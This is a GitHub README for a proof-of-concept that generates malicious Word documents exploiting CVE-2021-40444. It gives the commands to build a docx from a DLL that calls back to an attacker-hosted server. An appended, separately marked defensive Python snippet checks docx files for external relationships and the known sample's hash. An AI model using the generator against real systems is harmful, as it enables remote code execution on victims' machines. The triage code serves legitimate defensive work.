lockedbyte/CVE-2021-40444

CVE-2021-40444 PoC

Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

This script was created by reverse engineering the sample used in the wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (sudo apt-get install lcab)

See REPRODUCE.md for manual reproduction steps.

If your generated cab is not working, try pointing the exploit.html URL to calc.cab.

Using

First, generate a malicious docx document from a DLL. You can use the one at test/calc.dll, which just pops calc.exe via a call to system():

python3 exploit.py generate test/calc.dll http://<SRV IP>

Document generation

Once you have generated the malicious docx (it will be at out/), you can set up the server:

sudo python3 exploit.py host 80

Server

Finally, try the docx in a Windows virtual machine:

Pop Calc
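For defenders triaging documents like the one produced above, the following added example (not part of this repository) checks a .docx against the in-the-wild SHA-256 quoted in this README and lists remote references stored in the package. It assumes the server URL passed to `generate` ends up as an external relationship in the docx; the function names, the relationship type in the sample and the 192.0.2.10 address are constructed for illustration.

```python
import hashlib
import io
import re
import zipfile

# SHA-256 of the in-the-wild sample, as quoted in this README.
ITW_SHA256 = "938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52"
MAX_RELS_SIZE = 1 << 20  # skip oversized parts instead of inflating them
_REL = re.compile(r"<(?:\w+:)?Relationship\b[^>]*>")
_ATTR = re.compile(r"""(\w+)\s*=\s*(["'])(.*?)\2""")
# Constructed sample (not from the repo): a hyperlink and a remote object reference.
_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
CONSTRUCTED_RELS = (
    f'<Relationships><Relationship Id="rId1" Type="{_NS}hyperlink" '
    f'Target="https://example.com/" TargetMode="External"/>'
    f'<Relationship Id="rId2" Type="{_NS}oleObject" '
    f'Target="http://192.0.2.10/placeholder.html" TargetMode="External"/></Relationships>'
)


def external_relationships(docx_bytes):
    """Return sorted (part, type, target) for each TargetMode="External" entry."""
    found = set()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for info in pkg.infolist():
            if not info.filename.lower().endswith(".rels") or info.file_size > MAX_RELS_SIZE:
                continue
            for element in _REL.findall(pkg.read(info).decode("utf-8", "replace")):
                attrs = {k.lower(): v for k, _, v in _ATTR.findall(element)}
                if attrs.get("targetmode", "").lower() == "external":
                    rel_type = attrs.get("type", "").rsplit("/", 1)[-1]
                    found.add((info.filename, rel_type, attrs.get("target", "")))
    return sorted(found)


def triage(docx_bytes):
    """Hash match plus external relationships other than click-to-follow hyperlinks."""
    rels = external_relationships(docx_bytes)
    return {
        "known_sample": hashlib.sha256(docx_bytes).hexdigest() == ITW_SHA256,
        "suspicious": [r for r in rels if r[1].lower() != "hyperlink"],
    }


def build_constructed_docx(rels_xml=CONSTRUCTED_RELS):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()
```

A hash match only identifies the exact original sample; regenerated documents will differ, so the relationship listing is the more useful signal.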